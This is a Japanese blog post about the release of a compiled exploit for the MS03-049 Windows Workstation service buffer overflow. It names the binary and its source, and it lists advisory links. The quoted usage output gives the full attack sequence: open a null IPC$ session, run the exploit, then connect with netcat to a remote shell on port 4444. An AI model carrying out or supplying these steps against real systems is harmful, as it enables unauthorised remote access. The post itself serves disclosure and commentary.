• ms03-049 exploit by wirepair + compiled version (Microsoft Windows XPtarget) (securityfocus.ru)

ということでXP限定ですがコンパイル版登場

• 0349.exe
• ソース：0349.c.txt

D:\>0349.exe
ms03-049 wkksvc.dll buffer overflow by wirepair.
Usage: 0349.exe  
C:\>net use \\ip.ip.ip.ip\IPC$ "" /u:""
C:\>0349 ip.ip.ip.ip 1 (or 0)
open new cmd:
C:\>nc ip.ip.ip.ip 4444
If it doesn't hang the ip's invalid or it did not work

NULLセッションを確率後exploitを打ち込んで別のコマンドから4444に接続のようです。未検証。

関連記事：

• MS03-049が危険な理由
• Windowsの脆弱性(MS03-049)を攻撃するプログラムについて (@police)
• Windowsの脆弱性(MS03-049)を攻撃するプログラムについて(pdf)
• 雑学アドバイザリ 【 CA-2003-28 Workstation サービスを時系列に追っかけてみよう ・・・ 】(@Samさん)
• USのMicrosoft Security Bulletin MS03-043(MS)は更新されてMS03-043のパッチの件が追記
• Microsoft Workstation Service WKSSVC Remote Exploit (MS03-049)(securitylab.ru)
• Microsoft Workstation Service WKSSVC Remote Exploit (MS03-049)(securiteam)